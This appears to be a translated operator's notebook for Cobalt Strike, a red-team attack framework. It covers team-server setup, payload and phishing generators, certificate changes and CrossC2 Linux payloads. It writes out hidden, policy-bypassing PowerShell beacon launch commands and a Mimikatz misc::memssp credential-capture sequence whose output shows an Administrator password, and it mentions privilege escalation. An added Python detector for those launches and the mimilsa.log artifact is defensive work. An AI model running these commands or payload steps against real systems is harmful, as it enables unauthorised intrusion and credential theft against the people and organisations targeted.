Cobalt Strike Notes (continuously updated)
Introduction
Cobalt Strike is a Java-based penetration testing suite that is well known in the security field, usually referred to simply as CS. Since version 3.0 it no longer depends on the Metasploit framework but runs on its own, using a client/server split: there is one server instance, while several client instances can run at the same time, which makes it well suited to team operations. Multiple operators can connect to the same team server to share attack resources, target information and session data, simulate an Advanced Persistent Threat (APT) for adversary-emulation training, and carry out internal network penetration.

Cobalt Strike integrates the following core functions: port forwarding, a service-scanning module, automated exploitation, multi-mode port listeners, generation of Windows EXE, Windows DLL and Java trojans, generation of several kinds of Office macro payloads, and phishing features of the following types: site cloning, target information gathering, Java execution and automatic browser attacks.
Steps
Start the team server:
./teamserver
The teamserver file is the configuration file; edit it to change the port:
vim teamserver
Start the client:
java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
1. Cobalt Strike
Preferences: configure the Cobalt Strike interface, the console and its control panels, the report format settings, and TeamServer connection logging.
Visualization: choose how the display is laid out; there are three modes. They are hard to describe in words, so try them yourself to get familiar with them.
VPN Interfaces: configure VPN interfaces.
Listeners: configure listeners. This is the most important function; it contains many listener scripts.
2. View
Applications -> browser version information
Credentials -> the credentials captured with hashdump or Mimikatz can be viewed here
Downloads -> downloaded files
Event Log -> host check-in records and team chat records
Keystrokes -> keylogging records
Proxy Pivots -> proxy module
Screenshots -> screenshots
Script Console -> the script console; all scripts can be viewed at https://github.com/rsmudge/cortana-scripts
Targets -> display targets
Web Log -> web access records
3. Attacks

HTML Application: generates a malicious HTA trojan file;
MS Office Macro: creates a macro payload document;
a tool that generates the payload in several language versions;
generates an executable that runs the trojan through the AutoPlay mechanism;
a Windows packaging tool dedicated to bundling with document files;
Windows Executable: generates a stateless standalone executable;
a server-side executable program, available in several versions.

Web Drive-by (phishing attacks)
manages the web services that have been started;
clones a website to record the data submitted by victims;
provides a file download, and the file header can be modified;
similar to the Web_Delivery module in MSF;
phishing via a self-signed Java applet;
automatically detects the Java version and launches the matching attack;
collects system information (OS version, Flash version, browser version, etc.);
a module dedicated to phishing through e-mail.
4. Reporting
Activity report: generates an activity report
Hosts report: host report
Indicators of Compromise: indicators for the targets
Sessions report: session records
Social engineering report: social-engineering attack report
Export data: export data
Practical operation
Beacon is CS's internal listener: a specific payload runs on the target host to connect the shell back to CS; it covers the DNS, HTTP and SMB protocols.
Foreign is a listener for cross-platform integration; it is widely used together with MSF to bring meterpreter into the MSF environment.

Regenerating the certificate

Change the certificate's fields
View the certificate information:
keytool -list -v -keystore cobaltstrike.store -storepass xingshen

Change the default password

Certificate creation inside the cobaltstrike.jar file:
keytool -keystore ./ssl.store -storepass 123456q -keypass 123456q -genkey -keyalg RSA -alias Chrome -dname "CN=051, OU=SSL-RSA, O=Chrome, L=SOMWHERE, ST=Cyanosphere, C=Earth"
keytool is the key management tool shipped with the JDK; it generates and stores keys according to its command-line arguments. This command creates a keystore file at ./ssl.store, sets the keystore password (-storepass) to 123456q and the key password (-keypass) to 123456q as well. -genkey generates a new key pair, -keyalg RSA selects the RSA algorithm, -alias Chrome names the entry Chrome, and -dname "CN=051..." sets the distinguished name recorded in the certificate.
Linux
Install Java:
yum install java-11-openjdk.i686
CrossC2

Configuration

The configuration paths differ between Linux and Windows.
Load the configuration file.

At this point the server generates .cobaltstrike.beacon_keys.
Copy the .cobaltstrike.beacon_keys file from the Cobalt Strike server into the Cobalt Strike client directory.
The current CrossC2 version (CrossC2 v1.0) already supports HTTPS beacons, so enable an HTTPS listener under Listeners.

Generate the Linux payload
CS 4.4: genCrossC2 <listener IP> <listener port> <cs_key file> null Linux x64 <payload name> stager 4.4
Give the payload execute permission.

Run the payload; the host checks in.

Obtaining Windows passwords
Fileless check-in:
powershell -nop -w hidden -encodedcommand ...
File-based check-in:
PowerShell.exe -ep bypass -w hidden -nop -File C:\Users\nsfocus\Desktop\payload.ps1
Mimikatz in Beacon
To obtain the current user's password, run mimikatz: right-click a session that has administrator privileges, choose Access, and in its submenu choose Run Mimikatz; or type the logonpasswords command in the console.

Under View --> Credentials you can see the data collected by hashdump and mimikatz.

The above covers only the tasks mimikatz can carry out by itself; next, look at how misc::memssp is used:
mimikatz !misc::memssp
cd C:\Windows\system32
shell dir mimilsa.log
shell type mimilsa.log
Detailed run:
Next, change to the C:\Windows\system32 directory:
beacon> cd C:\Windows\system32
[*] cd C:\Windows\system32
[+] host called home, sent: 27 bytes
beacon> shell dir mimilsa.log
[*] Tasked beacon to run: dir mimilsa.log
[+] host called home, sent: 46 bytes
[+] received output:
驱动器 C 中的卷没有标签。卷的序列号是 BE29-9C84
C:\Windows\system32 的目录
2020/07/23 21:47 24 mimilsa.log
1 个文件 24 字节
0 个目录 17,394,728,960 可用字节
beacon> shell type mimilsa.log
[*] Tasked beacon to run: type mimilsa.log
[+] host called home, sent: 47 bytes
[+] received output:
[00000000:000003e5] \
[00000000:002b99a7] WIN-75F8PRJM4TP\Administrator Password123!
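The PowerShell launch lines above and the mimilsa.log file that misc::memssp leaves behind are all things the defending side can alert on. The following is an added detection example, my own code and not part of the original note or of Cobalt Strike: it runs two rules over constructed, Sysmon-style sample events; the key=value event format, the field names and the sample values are assumptions.

```python
import re

# Constructed sample events (not from the original note), in a simplified key=value
# form loosely modelled on Sysmon EventID 1 (process create) and 11 (file create).
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -nop -w hidden -encodedcommand <constructed-base64>"',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="PowerShell.exe -ep bypass -w hidden -nop -File C:\\Users\\user\\Desktop\\payload.ps1"',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -Command Get-Date"',
    'EventID=11 Image=C:\\Windows\\System32\\lsass.exe TargetFilename=C:\\Windows\\system32\\mimilsa.log',
    'EventID=11 Image=C:\\Windows\\explorer.exe TargetFilename=C:\\Users\\user\\notes.txt',
]

# Switches taken from the two launch lines in the note; each alone is common in
# admin scripts, so a hit needs the hidden window plus at least one more of them.
PS_FLAGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-enc(?:odedcommand)?\b", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}
# misc::memssp writes its captures to mimilsa.log under system32 (see the note above).
MEMSSP_LOG = re.compile(r"TargetFilename=(?P<path>\S*\\system32\\mimilsa\.log)", re.I)

def parse_event(line):
    """Turn one key=value event line into a dict; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def check_event(line):
    """Return (rule, detail) findings for a single event line; [] when nothing matched."""
    ev = parse_event(line)
    findings = []
    if ev.get("EventID") == "1" and "powershell" in ev.get("Image", "").lower():
        cmd = ev.get("CommandLine", "")
        hits = sorted(name for name, rx in PS_FLAGS.items() if rx.search(cmd))
        if "hidden_window" in hits and len(hits) >= 2:
            findings.append(("suspicious_powershell_launch", "+".join(hits)))
    if ev.get("EventID") == "11":
        m = MEMSSP_LOG.search(line)
        if m:
            findings.append(("memssp_artifact_written", m.group("path")))
    return findings

def scan(lines):
    """Run check_event over every line and flatten the findings in order."""
    return [f for line in lines for f in check_event(line)]
```

Running scan(SAMPLE_EVENTS) flags the two launch lines and the mimilsa.log write, and ignores the plain Get-Date invocation and the unrelated file.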
Privilege escalation
On Windows, privilege escalation is mostly done with Rotten Potato.

A SYSTEM-level session is obtained.

